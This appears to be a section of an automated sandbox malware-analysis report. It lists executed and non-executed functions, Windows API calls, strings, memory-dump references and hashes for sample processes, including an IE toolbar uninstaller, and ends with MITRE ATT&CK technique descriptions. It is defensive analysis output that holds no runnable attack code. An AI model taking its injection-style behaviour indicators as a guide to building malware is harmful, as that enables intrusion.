amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: vhZp0W.exePID: 4336, Parent PID: 7296COMMON

Executed Functions

Function 0170017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 017001DF

Memory Dump Source

Source File: 00000027.00000003.2746927166.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1700000_vhZp0W.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 83a6bbfcebadab211a3a635c0925ebf11c1ab0050719dcd6fdf7d2a0d89ea7a8
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 71A13770A00606EFDB16CFA9C880BAEFBF1FF49364B1580A9E515D7291D770EA51CB90

Function 04D0044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04D0048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 04D004F1

Memory Dump Source

Source File: 00000027.00000003.2750848178.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_4d00000_vhZp0W.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: 23e4c45cf41d89e58e9ca40dde06a017cc61fb2515816edc88ba2bfe7274c397
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: 8721C675A00605BBDB229EA49C85FAFB7F9EF04214F10C468EA5AA32C2D671F9019664

Function 0170044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0170048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 017004F1

Memory Dump Source

Source File: 00000027.00000003.2746927166.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1700000_vhZp0W.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: fbbe5c8efb1e529016a122f3aaba9ec071a5020d7ef93cc305af708ca6ece831
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: 91210B75A00305EFD7229FA88C85FAFFBF8EF05264F114478FB0AA22C1D631A9019664

Function 04D0017F Relevance: 1.5, APIs: 1, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04D001DF

Memory Dump Source

Source File: 00000027.00000003.2750848178.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_4d00000_vhZp0W.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 76730b5161718d3ef41bc6742038f9e112cd8eee561a058d3bde69a3dfcc8b8a
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 2DA13670A00606EFDB16CFA9D880BAEB7B5FF48304F5481A9E415DB291E770FA51CB94

Non-executed Functions

Function 04D000CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

ntdl, xrefs: 04D00142
l, xrefs: 04D00149

Memory Dump Source

Source File: 00000027.00000003.2750848178.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_4d00000_vhZp0W.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: 25f2d4c13aeb117bbfc018cf8cbc79da2508c37c06729b0e370c0f1d546bb27f
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: B9118EB5700A01AFDB16AF18D808B0EBBF6FF88714B21C159E00597750EB34AA218BE5

Function 017000CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

l, xrefs: 01700149
ntdl, xrefs: 01700142

Memory Dump Source

Source File: 00000027.00000003.2746927166.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1700000_vhZp0W.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: deead53b0805b0e0709d3dccc75cdd6c5fae635832ecc63f576858fd19f3072b
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: D9115EB5701A02EFCB16EF18C808A0EFBF6FF88760B218159E105D7754EB359A218BD5

Function 04D00643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

l, xrefs: 04D0068E
ntdl, xrefs: 04D00684

Memory Dump Source

Source File: 00000027.00000003.2750848178.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_4d00000_vhZp0W.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: b38c8dd000e769e9b7c81db8140aa73fb722baf4ca5ce68325cfa2bb9981005b
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: 74018871700114BFDB15DF99D845FAEFBB9EF85654F448069F904A7350DA70EE008BA1

Function 01700643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

ntdl, xrefs: 01700684
l, xrefs: 0170068E

Memory Dump Source

Source File: 00000027.00000003.2746927166.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1700000_vhZp0W.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: 762a5a2737355f29e35c99d68d72bdea544a36f0a64a03ee403e65b63d811ecf
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: 38018871700215AFCB05DF99CC45EAEFBF9EF94664F144069F904A7351DA71DE008BA1

Analysis Process: 1y6U0V.exePID: 1784, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1048
Total number of Limit Nodes:	28

Executed Functions

Function 00951000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00951006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00951013
GetLastError.KERNEL32 ref: 0095101F
GetCommandLineW.KERNEL32(?), ref: 00951040
CommandLineToArgvW.SHELL32(00000000), ref: 00951047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00951061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00951073
LoadLibraryW.KERNELBASE(?), ref: 00951085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00951097
FreeLibrary.KERNELBASE(00000000), ref: 009510A4
CloseHandle.KERNELBASE(00000000), ref: 009510AB
CoUninitialize.COMBASE ref: 009510B1
LocalFree.KERNEL32(00000000), ref: 009510BC

Strings

MyUnregisterServer, xrefs: 00951091
Global\IEToolbarUninstaller, xrefs: 0095100C
tbcore3U.dll, xrefs: 0095106E, 00951079
tbcore3.dll, xrefs: 0095105C, 00951067

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: 35684d4b247c695ea2c497522f99a5f31c2e88b965f5e4f53f6fcc5e8d4dddf5
Instruction ID: e2fd9e99ad3fefdc870bf3a89656c1059e8e66d6d9d687f3fe28daf925b28db7
Opcode Fuzzy Hash: 35684d4b247c695ea2c497522f99a5f31c2e88b965f5e4f53f6fcc5e8d4dddf5
Instruction Fuzzy Hash: 1F117F3261D765EB9320EB73AC08BAF379CAA45767B000525FD42E20D0DF658D4DA7B2

Function 00951465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 0095146D

Part of subcall function 0095143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00951472,?,?,009554EE,000000FF,0000001E,?,009536FC,?,00000001,?,?,00952A2A,00000018), ref: 00951444
Part of subcall function 0095143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00951454

ExitProcess.KERNEL32 ref: 00951476

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3d0cd286f58ccba7be861ae53be96eac156328f2d47d57b92dd4d594b03d35be
Instruction ID: 3d7d680ca7561592f841253f89b45e6aab157629223fb5b9bc7de0e253f98a01
Opcode Fuzzy Hash: 3d0cd286f58ccba7be861ae53be96eac156328f2d47d57b92dd4d594b03d35be
Instruction Fuzzy Hash: 1CB09B31004108BBDB012F13DC0994E3F15FB803517508010F80845071DF719D959790

Function 0095261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00952630

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 98776e124303a22b84ea996dd269b24e303f37fb8473ed43d521a1c92af22571
Instruction ID: e32f6c81fc95a392c2f4a1666788820bdd18ed4d243754507c53045ae709524c
Opcode Fuzzy Hash: 98776e124303a22b84ea996dd269b24e303f37fb8473ed43d521a1c92af22571
Instruction Fuzzy Hash: 38D05E325683445EDB109F726C497623BDCD384396F104436B90CC61A0F670C594AB40

Function 00951681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 0095168D

Part of subcall function 00951555: __lock.LIBCMT ref: 00951563
Part of subcall function 00951555: __decode_pointer.LIBCMT ref: 0095159A
Part of subcall function 00951555: __decode_pointer.LIBCMT ref: 009515AF
Part of subcall function 00951555: __decode_pointer.LIBCMT ref: 009515D9
Part of subcall function 00951555: __decode_pointer.LIBCMT ref: 009515EF
Part of subcall function 00951555: __decode_pointer.LIBCMT ref: 009515FC
Part of subcall function 00951555: __initterm.LIBCMT ref: 0095162B
Part of subcall function 00951555: __initterm.LIBCMT ref: 0095163B

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 492c28b59003fa15fe85a1d41b82515f72d9d1bd49fa82e16f76f611637e26d4
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: F9B0923258020833DB202586AC03F063A0987C0BA0E260020FA0C191E1AAA2A966818A

Non-executed Functions

Function 009510CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00951346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0095135B
UnhandledExceptionFilter.KERNEL32(0095816C), ref: 00951366
GetCurrentProcess.KERNEL32(C0000409), ref: 00951382
TerminateProcess.KERNEL32(00000000), ref: 00951389

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f90d2aab8b86c3cfa4254f214435578253d8d90f7289a57df6cda7b3b60f237e
Instruction ID: b9f0135216aa8efd124800a8bf943c4ec12a4f910f2730549014d6e268131c12
Opcode Fuzzy Hash: f90d2aab8b86c3cfa4254f214435578253d8d90f7289a57df6cda7b3b60f237e
Instruction Fuzzy Hash: 5021C2B44293049FC750EF67FD446593BB4BB48343F50421AE60897AB0EBB45989EB4A

Function 009521E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00959458,0000000C,00952320,00000000,00000000,?,0095174F,00000003,?,?,?,?,?,?,009510F6), ref: 009521F7
__crt_waiting_on_module_handle.LIBCMT ref: 00952202

Part of subcall function 009513E1: Sleep.KERNEL32(000003E8,00000000,?,00952148,KERNEL32.DLL,?,00952194,?,0095174F,00000003), ref: 009513ED
Part of subcall function 009513E1: GetModuleHandleW.KERNEL32(?,?,00952148,KERNEL32.DLL,?,00952194,?,0095174F,00000003,?,?,?,?,?,?,009510F6), ref: 009513F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0095222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0095223B
__lock.LIBCMT ref: 0095225D
InterlockedIncrement.KERNEL32(0095A4D8), ref: 0095226A
__lock.LIBCMT ref: 0095227E
___addlocaleref.LIBCMT ref: 0095229C

Strings

KERNEL32.DLL, xrefs: 009521F1, 009521F6, 00952201
EncodePointer, xrefs: 0095221F
DecodePointer, xrefs: 00952233

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 80f0de06a07cbddc92bbeabbeeb4bd57fc14d8bf251825e026b9122e844f09ee
Instruction ID: 0df9df003e4ee4b1980772db439c19df66e3652d7f8240317f3701a764d1d11a
Opcode Fuzzy Hash: 80f0de06a07cbddc92bbeabbeeb4bd57fc14d8bf251825e026b9122e844f09ee
Instruction Fuzzy Hash: 8811D271800700DED720EF77D845B4BBBE0AF95312F10451AECA9A32E0CB7499489B24

Function 009540A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 009540AC

Part of subcall function 00952345: __getptd_noexit.LIBCMT ref: 00952348
Part of subcall function 00952345: __amsg_exit.LIBCMT ref: 00952355

__amsg_exit.LIBCMT ref: 009540CC
__lock.LIBCMT ref: 009540DC
InterlockedDecrement.KERNEL32(?), ref: 009540F9
InterlockedIncrement.KERNEL32(00902AF0), ref: 00954124

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7249b7268758432fae9e83e997f931aea8205f1124d3b55d55dcb34d86a4bdd3
Instruction ID: 3e9e2ea18d9beed3f9306c44b30baf4037d4732e77ee6a69ef8016b41252d6c3
Opcode Fuzzy Hash: 7249b7268758432fae9e83e997f931aea8205f1124d3b55d55dcb34d86a4bdd3
Instruction Fuzzy Hash: 6101E93290AB219BCBA5EF278806359B360BB50717F144105ED00A7291DB34A9CAEBDA

Function 009535EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0095360C

Part of subcall function 00952AA0: __mtinitlocknum.LIBCMT ref: 00952AB6
Part of subcall function 00952AA0: __amsg_exit.LIBCMT ref: 00952AC2
Part of subcall function 00952AA0: EnterCriticalSection.KERNEL32(?,?,?,00955600,00000004,00959628,0000000C,00953746,?,?,00000000,00000000,00000000,?,009522F7,00000001), ref: 00952ACA

___sbh_find_block.LIBCMT ref: 00953617
___sbh_free_block.LIBCMT ref: 00953626
HeapFree.KERNEL32(00000000,?,00959568,0000000C,00952A81,00000000,009594C8,0000000C,00952ABB,?,?,?,00955600,00000004,00959628,0000000C), ref: 00953656
GetLastError.KERNEL32(?,00955600,00000004,00959628,0000000C,00953746,?,?,00000000,00000000,00000000,?,009522F7,00000001,00000214), ref: 00953667

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 07efbc4e13c99ef872cd51c7c6356a7ab2b0272c004cc1a2af36bb6d6ebea14e
Instruction ID: 307e8f07d416d686de8c2fd2d407d162c595f8df8fee51b34fcdd82bc4c23838
Opcode Fuzzy Hash: 07efbc4e13c99ef872cd51c7c6356a7ab2b0272c004cc1a2af36bb6d6ebea14e
Instruction Fuzzy Hash: B7014F7190A305BADB21EB739C07B5E3768AF517A3F60805DFC40661D2DA3486489B59

Function 00953E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00953E10

Part of subcall function 00952345: __getptd_noexit.LIBCMT ref: 00952348
Part of subcall function 00952345: __amsg_exit.LIBCMT ref: 00952355

__getptd.LIBCMT ref: 00953E27
__amsg_exit.LIBCMT ref: 00953E35
__lock.LIBCMT ref: 00953E45

Memory Dump Source

Source File: 0000002B.00000002.2758422551.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000002B.00000002.2758401540.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758465837.000000000095A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.2758487125.000000000095C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_950000_1y6U0V.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: dc79e41493f72bddea1682c420d0865b1bc36db67201eb69a799f3599f5a0804
Instruction ID: 8b52bdd3852af728dbc71a73a8b1c9e90dfdb6a70ea90a826bc4c5908b9e01a1
Opcode Fuzzy Hash: dc79e41493f72bddea1682c420d0865b1bc36db67201eb69a799f3599f5a0804
Instruction Fuzzy Hash: D7F090329043008BD720FFB7840774D73E0AF85B53F108549EC45972E1CB789A0D8B92

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
